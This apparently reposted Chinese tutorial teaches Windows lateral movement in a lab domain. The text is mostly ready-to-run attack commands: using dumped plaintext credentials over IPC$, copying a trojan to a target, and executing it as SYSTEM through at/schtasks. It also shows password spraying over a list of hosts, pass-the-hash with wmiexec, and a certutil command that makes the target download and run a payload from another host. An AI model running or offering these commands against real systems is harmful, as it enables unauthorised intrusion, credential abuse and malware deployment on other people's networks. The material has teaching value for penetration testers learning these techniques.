|
IPC横向
本文主要讲解如何利用上一篇文中获取的主机明文凭据进行横向攻击,涉及的攻击手段IPC连接和一些工具的使用。IPC(Inter - Process Communication)即进程间通信,旨在让不同进程能够相互交换数据、传递信息,协同完成复杂任务。常见的IPC对象有消息队列(Message Queue)、共享内存(Shared Memory)和信号量(Semaphore)
|
IPC横向
混子Hacker
01
建立连接
IPC协议是指进程间通信(Inter-Process Communication)的协议和机制,允许不同进程之间进行数据交换和通信
IPC常用命令
net use \ipipc$ "password" /user:域名用户名 #建立连接
dir \ipc$ #列出c盘目录
type \ip\c$file #查看文件
copy shell.exe \ipc$ #拷贝本地文件到指定盘符下
copy \ip\c$file local_path #下载文件
net use \ipipc$ /delete #删除ipc连接
at \ip 时间 c:shell.exe #创建计划任务
net use或net share #查看主机ipc连接
建立IPC连接
使用net use
利用上一篇文章中Mimikatz抓取的明文密码创建ipc连接
net use \192.168.52.138ipc$ "password" /user:域名用户名
使用net use或net share查看主机是否存在ipc连接
使用dir \192.168.52.138c$ 列出C盘目录
使用copy将木马通过ipc连接复制到对端主机上
copy shell.exe \192.168.52.138c$
使用dir查看是否上传成功
使用以下命令删除ipc连接
net use \192.168.232.132ipc$ /delete
混子Hacker
02
计划任务执行木马
上传成功之后使用定时任务执行木马
添加计划任务有两种方式at和schtasks
at命令:
仅支持Windows早期版本(如Windows XP/7),
Windows Server 2012及更高版本已弃用
schtasks命令:
适用于所有现代Windows系统(包括Windows 10/11及Server系列)
是微软推荐替代at的工具
at \192.168.52.138 23:00 c:shell.exe
at 1 /delete
schtasks /create /tn hunzihacker /sc ONCE /st 22:00 /tr C:artifact.exe /ru system
/tn 计划任务的名称
/sc 计划任务的类型
/st 计划任务的执行时间
/tr 运行的程序或命令
/ru 运行任务的用户
可以等到时自动运行,也可以使用以下命令直接运行
schtasks /run /s 192.168.52.138 /tn hunzihacker
schtasks /query /tn test #查询计划任务
schtasks /delete /tn test /f #删除计划任务
批处理多主机尝试
For /F %%i in (ips.txt) do net use \%%iipc$ "password" /user:administrator
混子Hacker
03
工具使用
原文链接:
https://www.cnblogs.com/hellobao/articles/17308109.html
1、psexec.py创建交互shell
脚本会通过管道上传一个二进制文件到目标主机C:Windows目录,并在目标机器上创建服务,通过该服务运行二进制文件,运行结束后删除服务和二进制文件(该脚本上传的二进制文件和创建的服务名都是随机的)
python psexec.py god/administrator:hongrisec@2025@192.168.232.132
通过上传一个exe文件创建了一个shell会话
可以看到在Windows目录下存在一个exe文件
当退出的时候会删除该exe文件
2、wmic
Windows 系统管理工具,通过命令行访问 WMI(Windows Management Instrumentation)数据,用于查询、配置和管理本地/远程计算机的软硬件资源
wmic /node:ip /user:xxxx /password:xxxxx process call create "cmd.exe /c ipconfig>d:result.txt"
无需上传第三方软件,利用系统内置程序,单命令执行,执行后无结果回显
3、cscript
Windows 系统自带的命令行脚本解释器,用于执行 VBScript、JScript 等脚本文件(.vbs、.js)
cscript //nologo wmiexec.vbs /shell 191.168.52.136
需上传wmiexec.vbs然后进入该服务器内进行执行
4、wmiexec
一款基于 Python 的渗透测试工具,用于通过 WMI(Windows Management Instrumentation) 协议在 Windows 系统上远程执行命令
1.执行命令:
python wmiexec.py ./:@192.168.52.136 "cmd.exe /c certutil -urlcache -split -f http://192.168.52.137:8090/wmi.exe C:wmi.exe"
2.用hash的方式:
python wmiexec.py -hashes :36ec9d73422e1bf53b84fdb16a8e4198 ./[email protected] "whoami"
第三方软件 (交互式&单执行),容易被杀
5、PsExec64.exe
PsExec 是微软 Sysinternals 工具包中的一款命令行远程管理工具,由 Mark Russinovich 开发,后被微软收购并纳入官方工具集。它主要用于在本地或远程 Windows 系统上执行进程
使用 PsExec 连接到远程计算机时,它首先会在远程计算机上创建一个名为 PSEXESVC 的服务
psexec的基本原理:
1、通过ipc$连接admin$,释放二进制文件psexecsvc.exe到目标
2、通过服务管理SCManager远程创建一个psexec服务,并启动服务
3、客户端连接执行命令,服务端通过服务启动相应的程序执行命令并回显数据
4、运行结束后删除服务
psexec的使用前提:
1、对方主机开启了 admin$共享,如果关闭了admin$共享,会提示:找不到网络名
2、对方未开启防火墙
3、如果是工作组环境,则必须使用administrator用户连接(因为要在目标主机上面创建并启动服务),使用其他账号(包括管理员组中的非administrator用户)登录都会提示访问拒绝访问。
PsExec64.exe \ip -u <username> -p <password> -s cmd
【内网渗透基础】四、内网横向-主机凭据获取 |
<<< END >>>
原创文章|转载请附上原文出处链接
更多漏洞|关注作者查看
作者|混子Hacker
原文始发于微信公众号(混子Hacker):【内网渗透基础】四、内网横向-IPC横向
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论